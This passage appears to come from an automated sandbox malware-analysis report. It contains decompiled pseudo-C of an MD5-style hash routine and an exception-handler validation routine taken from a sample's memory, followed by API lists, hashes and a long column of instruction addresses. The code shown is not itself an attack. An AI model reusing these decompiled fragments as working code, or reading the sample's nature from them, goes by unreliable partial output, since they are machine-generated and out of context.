                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                  				_v8 = _t692;
                                                                                                                                  				_t697 = _v8;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                  				_v8 = _t699;
                                                                                                                                  				asm("rol eax, 0x7");
                                                                                                                                  				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                  				asm("rol ecx, 0xc");
                                                                                                                                  				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                  				_t508 =  !_t357;
                                                                                                                                  				asm("ror edx, 0xf");
                                                                                                                                  				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                  				_v12 = _t410;
                                                                                                                                  				_v12 =  !_v12;
                                                                                                                                  				asm("ror esi, 0xa");
                                                                                                                                  				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                  				asm("rol eax, 0x5");
                                                                                                                                  				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                  				asm("rol ecx, 0x9");
                                                                                                                                  				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                  				asm("rol edx, 0xe");
                                                                                                                                  				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                  				asm("ror esi, 0xc");
                                                                                                                                  				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                  				asm("rol ecx, 0xb");
                                                                                                                                  				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                  				asm("rol edx, 0x10");
                                                                                                                                  				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                  				_t599 = _t367 ^ _t420;
                                                                                                                                  				asm("ror esi, 0x9");
                                                                                                                                  				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                  				asm("rol edi, 0xb");
                                                                                                                                  				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                  				asm("rol edx, 0x10");
                                                                                                                                  				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                  				_t338 = _t607 ^ _t422;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                  				asm("rol esi, 0xb");
                                                                                                                                  				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                  				asm("rol edi, 0x10");
                                                                                                                                  				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                  				_t424 = _t734 ^ _t613;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                  				asm("rol eax, 0x4");
                                                                                                                                  				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                  				asm("rol edx, 0xb");
                                                                                                                                  				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                  				asm("rol esi, 0x10");
                                                                                                                                  				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                  				asm("ror ecx, 0x9");
                                                                                                                                  				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                  				asm("ror ecx, 0xb");
                                                                                                                                  				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                  				asm("ror ecx, 0xb");
                                                                                                                                  				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                  				asm("ror edi, 0xb");
                                                                                                                                  				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                  				asm("rol eax, 0x6");
                                                                                                                                  				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                  				asm("rol edx, 0xa");
                                                                                                                                  				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                  				_t400 = _a4;
                                                                                                                                  				asm("rol esi, 0xf");
                                                                                                                                  				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                  				 *_t400 =  *_t400 + _t259;
                                                                                                                                  				asm("ror eax, 0xb");
                                                                                                                                  				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                  				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                  				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                  				return memset( &_v76, 0, 0x40);
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                  • Opcode ID: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
                                                                                                                                  • Instruction ID: 1ac2638bb8d35e50099cd2130f406509964cb5b5650409a0c56cc51896fa9c46
                                                                                                                                  • Opcode Fuzzy Hash: c932cbf2a409a87c6291a25323f1d36c96c09ec801fe66f8d437da4467a69dd6
                                                                                                                                  • Instruction Fuzzy Hash: 7A22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E933CC9,?,?,00000008,?,?,6E943264,00000000), ref: 6E933EFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: ace0544ab90d284e76825220e2466fcdcfa3e5424df9a01a755b9ab277576cb7
                                                                                                                                  • Instruction ID: c1ff1db682849dc0d3c59b73d3e464833a83d3b68d53fba03f5e5417b85e587f
                                                                                                                                  • Opcode Fuzzy Hash: ace0544ab90d284e76825220e2466fcdcfa3e5424df9a01a755b9ab277576cb7
                                                                                                                                  • Instruction Fuzzy Hash: F4B17635260619CFEB14CF68C49AB947BB0FF45365F658658E8A9CF2A1C335E982CF40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3B149(long _a4) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				short* _v32;
                                                                                                                                  				void _v36;
                                                                                                                                  				void* _t57;
                                                                                                                                  				signed int _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				void* _t63;
                                                                                                                                  				signed int* _t68;
                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  				intOrPtr _t72;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t78;
                                                                                                                                  				void _t80;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				signed int _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				short* _t87;
                                                                                                                                  				void* _t89;
                                                                                                                                  				signed int* _t90;
                                                                                                                                  				long _t91;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				void* _t104;
                                                                                                                                  				long _t108;
                                                                                                                                  				signed int _t110;
                                                                                                                                  
                                                                                                                                  				_t108 = _a4;
                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						_a4 = 0;
                                                                                                                                  						_t57 = _t76;
                                                                                                                                  						do {
                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                  								L20:
                                                                                                                                  								_t63 = 0;
                                                                                                                                  								L60:
                                                                                                                                  								return _t63;
                                                                                                                                  							}
                                                                                                                                  							L9:
                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                  							}
                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                  						__eflags = _a4;
                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                  							L15:
                                                                                                                                  							_t81 =  *0xa3d318; // 0x0
                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                  							_t58 = 0;
                                                                                                                                  							__eflags = _t81;
                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                  								L18:
                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                  								__eflags = _t61;
                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                  									_t62 = 0;
                                                                                                                                  									__eflags = 0;
                                                                                                                                  								} else {
                                                                                                                                  									_t62 = _a4;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t62;
                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                  									L59:
                                                                                                                                  									_t63 = _t104;
                                                                                                                                  									goto L60;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                  										L46:
                                                                                                                                  										_t63 = 1;
                                                                                                                                  										 *0xa3d360 = 1;
                                                                                                                                  										__eflags =  *0xa3d360;
                                                                                                                                  										if( *0xa3d360 != 0) {
                                                                                                                                  											goto L60;
                                                                                                                                  										}
                                                                                                                                  										_t84 =  *0xa3d318; // 0x0
                                                                                                                                  										__eflags = _t84;
                                                                                                                                  										_t93 = _t84;
                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                  											L51:
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                  												L58:
                                                                                                                                  												 *0xa3d360 = 0;
                                                                                                                                  												goto L5;
                                                                                                                                  											}
                                                                                                                                  											_t77 = 0xf;
                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                  												_t77 = _t84;
                                                                                                                                  											}
                                                                                                                                  											_t94 = 0;
                                                                                                                                  											__eflags = _t77;
                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                  												L56:
                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                  													__eflags = _t86;
                                                                                                                                  													 *0xa3d318 = _t86;
                                                                                                                                  												}
                                                                                                                                  												goto L58;
                                                                                                                                  											} else {
                                                                                                                                  												do {
                                                                                                                                  													_t68 = 0xa3d320 + _t94 * 4;
                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                  												goto L56;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										_t69 = 0xa3d31c + _t84 * 4;
                                                                                                                                  										while(1) {
                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                  												goto L51;
                                                                                                                                  											}
                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L51;
                                                                                                                                  										}
                                                                                                                                  										goto L51;
                                                                                                                                  									}
                                                                                                                                  									_t87 = _v32;
                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                  										goto L20;
                                                                                                                                  									}
                                                                                                                                  									goto L46;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L16:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							 *0xa3d360 = 1;
                                                                                                                                  							__eflags =  *0xa3d360;
                                                                                                                                  							if( *0xa3d360 != 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
                                                                                                                                  							if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
                                                                                                                                  								L32:
                                                                                                                                  								_t100 = 0;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                  									L34:
                                                                                                                                  									 *0xa3d360 = 0;
                                                                                                                                  									goto L5;
                                                                                                                                  								} else {
                                                                                                                                  									goto L33;
                                                                                                                                  								}
                                                                                                                                  								do {
                                                                                                                                  									L33:
                                                                                                                                  									_t90 = 0xa3d320 + _t100 * 4;
                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t25 = _t81 - 1; // -1
                                                                                                                                  							_t58 = _t25;
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                  								L28:
                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                  									__eflags = _t81;
                                                                                                                                  									 *0xa3d318 = _t81;
                                                                                                                                  								}
                                                                                                                                  								_t28 = _t81 - 1; // 0x0
                                                                                                                                  								_t58 = _t28;
                                                                                                                                  								goto L32;
                                                                                                                                  							} else {
                                                                                                                                  								goto L25;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L25:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							goto L28;
                                                                                                                                  						}
                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					_t63 = 1;
                                                                                                                                  					goto L60;
                                                                                                                                  				} else {
                                                                                                                                  					goto L3;
                                                                                                                                  				}
                                                                                                                                  			}




































                                                                                                                                  0x00a3b346
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b338
                                                                                                                                  0x00a3b336
                                                                                                                                  0x00a3b312
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b31b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b31d
                                                                                                                                  0x00a3b31e
                                                                                                                                  0x00a3b321
                                                                                                                                  0x00a3b323
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b323
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b29c
                                                                                                                                  0x00a3b29f
                                                                                                                                  0x00a3b2a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2ad
                                                                                                                                  0x00a3b2af
                                                                                                                                  0x00a3b2b5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2bb
                                                                                                                                  0x00a3b2c1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2c7
                                                                                                                                  0x00a3b2c9
                                                                                                                                  0x00a3b2d2
                                                                                                                                  0x00a3b2d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2dc
                                                                                                                                  0x00a3b2df
                                                                                                                                  0x00a3b2e1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2e8
                                                                                                                                  0x00a3b2ea
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2ec
                                                                                                                                  0x00a3b2f0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2f0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1e2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1e4
                                                                                                                                  0x00a3b1e5
                                                                                                                                  0x00a3b1e7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1e7
                                                                                                                                  0x00a3b20f
                                                                                                                                  0x00a3b211
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b221
                                                                                                                                  0x00a3b223
                                                                                                                                  0x00a3b225
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b22b
                                                                                                                                  0x00a3b232
                                                                                                                                  0x00a3b25e
                                                                                                                                  0x00a3b25e
                                                                                                                                  0x00a3b260
                                                                                                                                  0x00a3b262
                                                                                                                                  0x00a3b276
                                                                                                                                  0x00a3b278
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b26d
                                                                                                                                  0x00a3b26e
                                                                                                                                  0x00a3b270
                                                                                                                                  0x00a3b272
                                                                                                                                  0x00a3b272
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b234
                                                                                                                                  0x00a3b234
                                                                                                                                  0x00a3b237
                                                                                                                                  0x00a3b239
                                                                                                                                  0x00a3b24b
                                                                                                                                  0x00a3b24b
                                                                                                                                  0x00a3b24e
                                                                                                                                  0x00a3b250
                                                                                                                                  0x00a3b250
                                                                                                                                  0x00a3b251
                                                                                                                                  0x00a3b251
                                                                                                                                  0x00a3b257
                                                                                                                                  0x00a3b257
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b242
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b244
                                                                                                                                  0x00a3b244
                                                                                                                                  0x00a3b245
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b245
                                                                                                                                  0x00a3b247
